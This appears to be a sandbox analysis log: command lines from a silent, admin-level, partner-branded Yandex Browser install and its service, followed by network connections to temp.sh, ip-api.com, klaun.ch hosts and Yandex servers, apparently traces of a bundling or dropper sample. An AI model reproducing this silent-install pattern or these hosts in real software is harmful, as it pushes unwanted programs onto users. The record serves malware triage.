"C:\Users\Admin\AppData\Local\Temp\YB_970D5.tmp\setup.exe" --install-archive="C:\Users\Admin\AppData\Local\Temp\YB_970D5.tmp\BROWSER.PACKED.7Z" --abt-config-resource-file="C:\Users\Admin\AppData\Local\Temp\abt_config_resource" --abt-update-path="C:\Users\Admin\AppData\Local\Temp\0de1d919-8e76-460f-bae5-959eaf727451.tmp" --brand-name=yandex --brand-package="C:\Users\Admin\AppData\Local\Temp\BrandFile" --clids-file="C:\Users\Admin\AppData\Local\Temp\clids.xml" --cumtom-welcome-page=https://browser.yandex.ru/promo/welcome_com/5/ --install-start-time-no-uac=541385404 --installer-brand-id=yandex --installer-partner-id=pseudoportal-ru --installerdata="C:\Users\Admin\AppData\Local\Temp\master_preferences" --job-name=yBrowserDownloader-{2830C1E5-8483-450B-8A59-CC558EB0D581} --local-path="C:\Users\Admin\AppData\Local\Temp\{D75E8FFB-E220-4A56-8F34-15BD8F50E315}.exe" --partner-package="C:\Users\Admin\AppData\Local\Temp\PartnerFile" --progress-window=0 --remote-url=http://downloader.yandex.net/downloadable_soft/browser/pseudoportal-ru/Yandex.exe?clid=6035461-354&ui={0805d991-6e7d-4048-beee-e5c45536178d} --send-statistics --silent --source=lite --use-user-default-locale --variations-update-path="C:\Users\Admin\AppData\Local\Temp\9ed2cb0c-90f5-4967-8273-2b90a8fd393f.tmp" --verbose-logging --yabrowser --yandex-website-icon-file="C:\Users\Admin\AppData\Local\Temp\website.ico" --verbose-logging --run-as-admin --target-path="C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application" --child-setup-process --restart-as-admin-time=563454059

C:\Users\Admin\AppData\Local\Temp\YB_970D5.tmp\setup.exe

C:\Users\Admin\AppData\Local\Temp\YB_970D5.tmp\setup.exe --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\User Data\Crashpad" --url=https://crash-reports.browser.yandex.net/submit --annotation=machine_id=e7ae39fa5eee477481dc83ee66f9242b --annotation=main_process_pid=19936 --annotation=plat=Win32 --annotation=prod=Yandex --annotation=session_logout=False --annotation=ver=24.6.0.1878 --initial-client-data=0x33c,0x340,0x344,0x318,0x348,0x1181cbc,0x1181cc8,0x1181cd4

C:\Windows\system32\OpenWith.exe

C:\Windows\system32\OpenWith.exe -Embedding

C:\Windows\TEMP\sdwra_19936_1205146255\service_update.exe

"C:\Windows\TEMP\sdwra_19936_1205146255\service_update.exe" --setup

C:\Program Files (x86)\Yandex\YandexBrowser\24.6.0.1878\service_update.exe

"C:\Program Files (x86)\Yandex\YandexBrowser\24.6.0.1878\service_update.exe" --install

C:\Program Files (x86)\Yandex\YandexBrowser\24.6.0.1878\service_update.exe

"C:\Program Files (x86)\Yandex\YandexBrowser\24.6.0.1878\service_update.exe" --run-as-service

C:\Program Files (x86)\Yandex\YandexBrowser\24.6.0.1878\service_update.exe

"C:\Program Files (x86)\Yandex\YandexBrowser\24.6.0.1878\service_update.exe" --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\TEMP\Crashpad --url=https://crash-reports.browser.yandex.net/submit --annotation=machine_id=e7ae39fa5eee477481dc83ee66f9242b --annotation=main_process_pid=17492 --annotation=plat=Win32 --annotation=prod=Yandex --annotation=session_logout=False --annotation=ver=24.6.0.1878 --initial-client-data=0x254,0x258,0x25c,0x230,0x260,0x4ab728,0x4ab734,0x4ab740

C:\Program Files (x86)\Yandex\YandexBrowser\24.6.0.1878\service_update.exe

"C:\Program Files (x86)\Yandex\YandexBrowser\24.6.0.1878\service_update.exe" --update-scheduler

C:\Program Files (x86)\Yandex\YandexBrowser\24.6.0.1878\service_update.exe

"C:\Program Files (x86)\Yandex\YandexBrowser\24.6.0.1878\service_update.exe" --update-background-scheduler

C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\clidmgr.exe

"C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\clidmgr.exe" --appid=yabrowser --vendor-xml-path="C:\Users\Admin\AppData\Local\Temp\clids.xml"

C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\clidmgr.exe

"C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\clidmgr.exe" --appid=yabrowser --vendor-xml-path="C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Temp\source19936_39465163\Browser-bin\clids_yandex_second.xml"

C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe

"C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe" --progress-window=0 --install-start-time-no-uac=541385404

C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe

C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\User Data\Crashpad" --url=https://crash-reports.browser.yandex.net/submit --annotation=machine_id= --annotation=main_process_pid=10208 --annotation=metrics_client_id=e7d2bece03224be8a7a2fb7118e369ba --annotation=plat=Win32 --annotation=prod=Yandex --annotation=session_logout=False --annotation=ver=24.6.0.1878 --initial-client-data=0x180,0x184,0x188,0x15c,0x18c,0x6d065a28,0x6d065a34,0x6d065a40

C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe

"C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe" --type=gpu-process --user-id=0805d991-6e7d-4048-beee-e5c45536178d --brand-id=yandex --partner-id=pseudoportal-ru --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --gpu-process-kind=sandboxed --field-trial-handle=2352,i,16258775396391445102,15492408051929202923,262144 --enable-features=InstallerNewIdentity2024 --variations-seed-version --mojo-platform-channel-handle=2348 /prefetch:2

C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe

"C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe" --type=gpu-process --user-id=0805d991-6e7d-4048-beee-e5c45536178d --brand-id=yandex --partner-id=pseudoportal-ru --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --use-gl=disabled --gpu-process-kind=trampoline --field-trial-handle=2184,i,16258775396391445102,15492408051929202923,262144 --enable-features=InstallerNewIdentity2024 --variations-seed-version --mojo-platform-channel-handle=2456 /prefetch:2

C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe

"C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=ru --service-sandbox-type=none --user-id=0805d991-6e7d-4048-beee-e5c45536178d --brand-id=yandex --partner-id=pseudoportal-ru --no-appcompat-clear --process-name="Network Service" --field-trial-handle=2656,i,16258775396391445102,15492408051929202923,262144 --enable-features=InstallerNewIdentity2024 --variations-seed-version --mojo-platform-channel-handle=2620 --brver=24.6.0.1878 /prefetch:3

C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe

"C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=ru --service-sandbox-type=service --user-id=0805d991-6e7d-4048-beee-e5c45536178d --brand-id=yandex --partner-id=pseudoportal-ru --no-appcompat-clear --process-name="Storage Service" --field-trial-handle=2860,i,16258775396391445102,15492408051929202923,262144 --enable-features=InstallerNewIdentity2024 --variations-seed-version --mojo-platform-channel-handle=3036 --brver=24.6.0.1878 /prefetch:8

C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe

"C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=ru --service-sandbox-type=audio --user-id=0805d991-6e7d-4048-beee-e5c45536178d --brand-id=yandex --partner-id=pseudoportal-ru --no-appcompat-clear --process-name="Audio Service" --field-trial-handle=3504,i,16258775396391445102,15492408051929202923,262144 --enable-features=InstallerNewIdentity2024 --variations-seed-version --mojo-platform-channel-handle=3500 --brver=24.6.0.1878 /prefetch:8

C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe

"C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --lang=ru --service-sandbox-type=none --user-id=0805d991-6e7d-4048-beee-e5c45536178d --brand-id=yandex --partner-id=pseudoportal-ru --no-appcompat-clear --process-name="Video Capture" --field-trial-handle=3680,i,16258775396391445102,15492408051929202923,262144 --enable-features=InstallerNewIdentity2024 --variations-seed-version --mojo-platform-channel-handle=3916 --brver=24.6.0.1878 /prefetch:8

C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe

"C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe" --type=renderer --user-id=0805d991-6e7d-4048-beee-e5c45536178d --brand-id=yandex --partner-id=pseudoportal-ru --extension-process --help-url=https://api.browser.yandex.ru/redirect/help/ --user-agent-info --web-ntp-url-for-renderer=https://webntp.yandex.ru/ --translate-security-origin=https://browser.translate.yandex.net/ --enable-instaserp --no-appcompat-clear --allow-prefetch --lang=ru --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4252,i,16258775396391445102,15492408051929202923,262144 --enable-features=InstallerNewIdentity2024 --variations-seed-version --mojo-platform-channel-handle=4244 /prefetch:2

C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe

"C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe" --type=utility --utility-sub-type=chrome.mojom.ProfileImport --lang=ru --service-sandbox-type=none --user-id=0805d991-6e7d-4048-beee-e5c45536178d --brand-id=yandex --partner-id=pseudoportal-ru --no-appcompat-clear --process-name="Импорт профилей" --field-trial-handle=4320,i,16258775396391445102,15492408051929202923,262144 --enable-features=InstallerNewIdentity2024 --variations-seed-version --mojo-platform-channel-handle=4472 --brver=24.6.0.1878 /prefetch:8

C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe

"C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=ru --service-sandbox-type=service --user-id=0805d991-6e7d-4048-beee-e5c45536178d --brand-id=yandex --partner-id=pseudoportal-ru --no-appcompat-clear --process-name="Data Decoder Service" --field-trial-handle=4468,i,16258775396391445102,15492408051929202923,262144 --enable-features=InstallerNewIdentity2024 --variations-seed-version --mojo-platform-channel-handle=4488 --brver=24.6.0.1878 /prefetch:8

C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe

"C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe" --type=renderer --user-id=0805d991-6e7d-4048-beee-e5c45536178d --brand-id=yandex --partner-id=pseudoportal-ru --help-url=https://api.browser.yandex.ru/redirect/help/ --user-agent-info --web-ntp-url-for-renderer=https://webntp.yandex.ru/ --translate-security-origin=https://browser.translate.yandex.net/ --enable-instaserp --no-appcompat-clear --allow-prefetch --lang=ru --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --field-trial-handle=4188,i,16258775396391445102,15492408051929202923,262144 --enable-features=InstallerNewIdentity2024 --variations-seed-version --mojo-platform-channel-handle=4232 /prefetch:1

C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe

"C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe" --type=renderer --user-id=0805d991-6e7d-4048-beee-e5c45536178d --brand-id=yandex --partner-id=pseudoportal-ru --help-url=https://api.browser.yandex.ru/redirect/help/ --user-agent-info --web-ntp-url-for-renderer=https://webntp.yandex.ru/ --translate-security-origin=https://browser.translate.yandex.net/ --enable-instaserp --no-appcompat-clear --lang=ru --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --field-trial-handle=5368,i,16258775396391445102,15492408051929202923,262144 --enable-features=InstallerNewIdentity2024 --variations-seed-version --mojo-platform-channel-handle=5372 /prefetch:1

C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe

"C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe" --type=utility --utility-sub-type=uwp_cookie_provider.mojom.UwpCookieProvider --lang=ru --service-sandbox-type=utility --user-id=0805d991-6e7d-4048-beee-e5c45536178d --brand-id=yandex --partner-id=pseudoportal-ru --no-appcompat-clear --process-name=uwp_cookie_provider.mojom.UwpCookieProvider --field-trial-handle=4480,i,16258775396391445102,15492408051929202923,262144 --enable-features=InstallerNewIdentity2024 --variations-seed-version --mojo-platform-channel-handle=5588 --brver=24.6.0.1878 /prefetch:8

C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe

"C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=ru --service-sandbox-type=service --user-id=0805d991-6e7d-4048-beee-e5c45536178d --brand-id=yandex --partner-id=pseudoportal-ru --no-appcompat-clear --process-name="Data Decoder Service" --field-trial-handle=5812,i,16258775396391445102,15492408051929202923,262144 --enable-features=InstallerNewIdentity2024 --variations-seed-version --mojo-platform-channel-handle=4028 --brver=24.6.0.1878 /prefetch:8

C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe

"C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe" --type=renderer --user-id=0805d991-6e7d-4048-beee-e5c45536178d --brand-id=yandex --partner-id=pseudoportal-ru --help-url=https://api.browser.yandex.ru/redirect/help/ --user-agent-info --web-ntp-url-for-renderer=https://webntp.yandex.ru/ --translate-security-origin=https://browser.translate.yandex.net/ --ya-custo-process --enable-instaserp --no-appcompat-clear --lang=ru --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --field-trial-handle=6024,i,16258775396391445102,15492408051929202923,262144 --enable-features=InstallerNewIdentity2024 --variations-seed-version --mojo-platform-channel-handle=5620 /prefetch:1

C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe

"C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=ru --service-sandbox-type=service --user-id=0805d991-6e7d-4048-beee-e5c45536178d --brand-id=yandex --partner-id=pseudoportal-ru --no-appcompat-clear --process-name="Data Decoder Service" --field-trial-handle=6192,i,16258775396391445102,15492408051929202923,262144 --enable-features=InstallerNewIdentity2024 --variations-seed-version --mojo-platform-channel-handle=6092 --brver=24.6.0.1878 /prefetch:8

C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe

"C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe" --type=renderer --user-id=0805d991-6e7d-4048-beee-e5c45536178d --brand-id=yandex --partner-id=pseudoportal-ru --help-url=https://api.browser.yandex.ru/redirect/help/ --user-agent-info --web-ntp-url-for-renderer=https://webntp.yandex.ru/ --translate-security-origin=https://browser.translate.yandex.net/ --ya-custo-process --enable-instaserp --no-appcompat-clear --lang=ru --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --field-trial-handle=6420,i,16258775396391445102,15492408051929202923,262144 --enable-features=InstallerNewIdentity2024 --variations-seed-version --mojo-platform-channel-handle=6180 /prefetch:1

C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe

"C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=ru --service-sandbox-type=none --user-id=0805d991-6e7d-4048-beee-e5c45536178d --brand-id=yandex --partner-id=pseudoportal-ru --no-appcompat-clear --process-name="Утилиты Windows" --field-trial-handle=2228,i,16258775396391445102,15492408051929202923,262144 --enable-features=InstallerNewIdentity2024 --variations-seed-version --mojo-platform-channel-handle=4680 --brver=24.6.0.1878 /prefetch:8

C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe

"C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=ru --service-sandbox-type=service --user-id=0805d991-6e7d-4048-beee-e5c45536178d --brand-id=yandex --partner-id=pseudoportal-ru --no-appcompat-clear --process-name="Распаковщик файлов" --field-trial-handle=5928,i,16258775396391445102,15492408051929202923,262144 --enable-features=InstallerNewIdentity2024 --variations-seed-version --mojo-platform-channel-handle=4636 --brver=24.6.0.1878 /prefetch:8

C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe

"C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe" --type=renderer --user-id=0805d991-6e7d-4048-beee-e5c45536178d --brand-id=yandex --partner-id=pseudoportal-ru --help-url=https://api.browser.yandex.ru/redirect/help/ --user-agent-info --web-ntp-url-for-renderer=https://webntp.yandex.ru/ --translate-security-origin=https://browser.translate.yandex.net/ --enable-instaserp --no-appcompat-clear --lang=ru --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --field-trial-handle=5900,i,16258775396391445102,15492408051929202923,262144 --enable-features=InstallerNewIdentity2024 --variations-seed-version --mojo-platform-channel-handle=6476 /prefetch:1

C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe

"C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe" --type=renderer --user-id=0805d991-6e7d-4048-beee-e5c45536178d --brand-id=yandex --partner-id=pseudoportal-ru --help-url=https://api.browser.yandex.ru/redirect/help/ --user-agent-info --web-ntp-url-for-renderer=https://webntp.yandex.ru/ --translate-security-origin=https://browser.translate.yandex.net/ --enable-instaserp --no-appcompat-clear --lang=ru --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=22 --field-trial-handle=6204,i,16258775396391445102,15492408051929202923,262144 --enable-features=InstallerNewIdentity2024 --variations-seed-version --mojo-platform-channel-handle=4324 /prefetch:1

C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe

"C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=ru --service-sandbox-type=service --user-id=0805d991-6e7d-4048-beee-e5c45536178d --brand-id=yandex --partner-id=pseudoportal-ru --no-appcompat-clear --process-name="Data Decoder Service" --field-trial-handle=7088,i,16258775396391445102,15492408051929202923,262144 --enable-features=InstallerNewIdentity2024 --variations-seed-version --mojo-platform-channel-handle=7044 --brver=24.6.0.1878 /prefetch:8

C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe

"C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=ru --service-sandbox-type=service --user-id=0805d991-6e7d-4048-beee-e5c45536178d --brand-id=yandex --partner-id=pseudoportal-ru --no-appcompat-clear --process-name="Data Decoder Service" --field-trial-handle=6668,i,16258775396391445102,15492408051929202923,262144 --enable-features=InstallerNewIdentity2024 --variations-seed-version --mojo-platform-channel-handle=4836 --brver=24.6.0.1878 /prefetch:8

C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe

"C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=ru --service-sandbox-type=service --user-id=0805d991-6e7d-4048-beee-e5c45536178d --brand-id=yandex --partner-id=pseudoportal-ru --no-appcompat-clear --process-name="Data Decoder Service" --field-trial-handle=7108,i,16258775396391445102,15492408051929202923,262144 --enable-features=InstallerNewIdentity2024 --variations-seed-version --mojo-platform-channel-handle=7264 --brver=24.6.0.1878 /prefetch:8

C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe

"C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=ru --service-sandbox-type=service --user-id=0805d991-6e7d-4048-beee-e5c45536178d --brand-id=yandex --partner-id=pseudoportal-ru --no-appcompat-clear --process-name="Data Decoder Service" --field-trial-handle=2744,i,16258775396391445102,15492408051929202923,262144 --enable-features=InstallerNewIdentity2024 --variations-seed-version --mojo-platform-channel-handle=7500 --brver=24.6.0.1878 /prefetch:8

C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe

"C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=ru --service-sandbox-type=service --user-id=0805d991-6e7d-4048-beee-e5c45536178d --brand-id=yandex --partner-id=pseudoportal-ru --no-appcompat-clear --process-name="Data Decoder Service" --field-trial-handle=7120,i,16258775396391445102,15492408051929202923,262144 --enable-features=InstallerNewIdentity2024 --variations-seed-version --mojo-platform-channel-handle=7552 --brver=24.6.0.1878 /prefetch:8

C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe

"C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=ru --service-sandbox-type=service --user-id=0805d991-6e7d-4048-beee-e5c45536178d --brand-id=yandex --partner-id=pseudoportal-ru --no-appcompat-clear --process-name="Data Decoder Service" --field-trial-handle=7792,i,16258775396391445102,15492408051929202923,262144 --enable-features=InstallerNewIdentity2024 --variations-seed-version --mojo-platform-channel-handle=7692 --brver=24.6.0.1878 /prefetch:8

C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe

"C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=ru --service-sandbox-type=service --user-id=0805d991-6e7d-4048-beee-e5c45536178d --brand-id=yandex --partner-id=pseudoportal-ru --no-appcompat-clear --process-name="Data Decoder Service" --field-trial-handle=6368,i,16258775396391445102,15492408051929202923,262144 --enable-features=InstallerNewIdentity2024 --variations-seed-version --mojo-platform-channel-handle=7932 --brver=24.6.0.1878 /prefetch:8

C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe

"C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=ru --service-sandbox-type=service --user-id=0805d991-6e7d-4048-beee-e5c45536178d --brand-id=yandex --partner-id=pseudoportal-ru --no-appcompat-clear --process-name="Data Decoder Service" --field-trial-handle=7132,i,16258775396391445102,15492408051929202923,262144 --enable-features=InstallerNewIdentity2024 --variations-seed-version --mojo-platform-channel-handle=8072 --brver=24.6.0.1878 /prefetch:8

C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe

"C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=ru --service-sandbox-type=service --user-id=0805d991-6e7d-4048-beee-e5c45536178d --brand-id=yandex --partner-id=pseudoportal-ru --no-appcompat-clear --process-name="Data Decoder Service" --field-trial-handle=6704,i,16258775396391445102,15492408051929202923,262144 --enable-features=InstallerNewIdentity2024 --variations-seed-version --mojo-platform-channel-handle=8240 --brver=24.6.0.1878 /prefetch:8

C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe

"C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=ru --service-sandbox-type=service --user-id=0805d991-6e7d-4048-beee-e5c45536178d --brand-id=yandex --partner-id=pseudoportal-ru --no-appcompat-clear --process-name="Data Decoder Service" --field-trial-handle=8380,i,16258775396391445102,15492408051929202923,262144 --enable-features=InstallerNewIdentity2024 --variations-seed-version --mojo-platform-channel-handle=8264 --brver=24.6.0.1878 /prefetch:8

C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe

"C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=ru --service-sandbox-type=service --user-id=0805d991-6e7d-4048-beee-e5c45536178d --brand-id=yandex --partner-id=pseudoportal-ru --no-appcompat-clear --process-name="Data Decoder Service" --field-trial-handle=7112,i,16258775396391445102,15492408051929202923,262144 --enable-features=InstallerNewIdentity2024 --variations-seed-version --mojo-platform-channel-handle=8512 --brver=24.6.0.1878 /prefetch:8

C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe

"C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=ru --service-sandbox-type=service --user-id=0805d991-6e7d-4048-beee-e5c45536178d --brand-id=yandex --partner-id=pseudoportal-ru --no-appcompat-clear --process-name="Data Decoder Service" --field-trial-handle=6284,i,16258775396391445102,15492408051929202923,262144 --enable-features=InstallerNewIdentity2024 --variations-seed-version --mojo-platform-channel-handle=8676 --brver=24.6.0.1878 /prefetch:8

C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe

"C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=ru --service-sandbox-type=none --user-id=0805d991-6e7d-4048-beee-e5c45536178d --brand-id=yandex --partner-id=pseudoportal-ru --no-appcompat-clear --process-name="Утилиты Windows" --field-trial-handle=4828,i,16258775396391445102,15492408051929202923,262144 --enable-features=InstallerNewIdentity2024 --variations-seed-version --mojo-platform-channel-handle=5892 --brver=24.6.0.1878 /prefetch:8

C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe

"C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=ru --service-sandbox-type=none --user-id=0805d991-6e7d-4048-beee-e5c45536178d --brand-id=yandex --partner-id=pseudoportal-ru --no-appcompat-clear --process-name="Утилиты Windows" --field-trial-handle=4368,i,16258775396391445102,15492408051929202923,262144 --enable-features=InstallerNewIdentity2024 --variations-seed-version --mojo-platform-channel-handle=4392 --brver=24.6.0.1878 /prefetch:8

C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe

"C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=ru --service-sandbox-type=service --user-id=0805d991-6e7d-4048-beee-e5c45536178d --brand-id=yandex --partner-id=pseudoportal-ru --no-appcompat-clear --process-name="Распаковщик файлов" --field-trial-handle=4676,i,16258775396391445102,15492408051929202923,262144 --enable-features=InstallerNewIdentity2024 --variations-seed-version --mojo-platform-channel-handle=4636 --brver=24.6.0.1878 /prefetch:8

Network

Country Destination Domain Proto
US 8.8.8.8:53 temp.sh udp
FR 51.91.79.17:443 temp.sh tcp
FR 51.91.79.17:443 temp.sh tcp
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 13.86.106.20.in-addr.arpa udp
US 8.8.8.8:53 172.214.232.199.in-addr.arpa udp
US 8.8.8.8:53 17.79.91.51.in-addr.arpa udp
US 8.8.8.8:53 171.101.63.23.in-addr.arpa udp
US 8.8.8.8:53 11.97.55.23.in-addr.arpa udp
US 8.8.8.8:53 183.142.211.20.in-addr.arpa udp
US 8.8.8.8:53 217.106.137.52.in-addr.arpa udp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 1.112.95.208.in-addr.arpa udp
US 8.8.8.8:53 api.klaun.ch udp
US 104.26.10.58:80 api.klaun.ch tcp
US 8.8.8.8:53 58.10.26.104.in-addr.arpa udp
US 8.8.8.8:53 download.yandex.ru udp
RU 5.45.205.242:80 download.yandex.ru tcp
US 8.8.8.8:53 cachev2-ams03.cdn.yandex.net udp
NL 5.45.247.53:80 cachev2-ams03.cdn.yandex.net tcp
US 8.8.8.8:53 242.205.45.5.in-addr.arpa udp
US 8.8.8.8:53 53.247.45.5.in-addr.arpa udp
US 8.8.8.8:53 repos.klaun.ch udp
US 104.26.11.58:80 repos.klaun.ch tcp
RU 5.45.205.242:80 download.yandex.ru tcp
US 8.8.8.8:53 cachev2-kiv01.cdn.yandex.net udp
RU 5.45.192.183:80 cachev2-kiv01.cdn.yandex.net tcp
US 8.8.8.8:53 downloader.yandex.net udp
RU 5.45.205.242:80 downloader.yandex.net tcp
US 8.8.8.8:53 cachev2-ams01.cdn.yandex.net udp
NL 5.45.247.51:80 cachev2-ams01.cdn.yandex.net tcp
US 8.8.8.8:53 58.11.26.104.in-addr.arpa udp
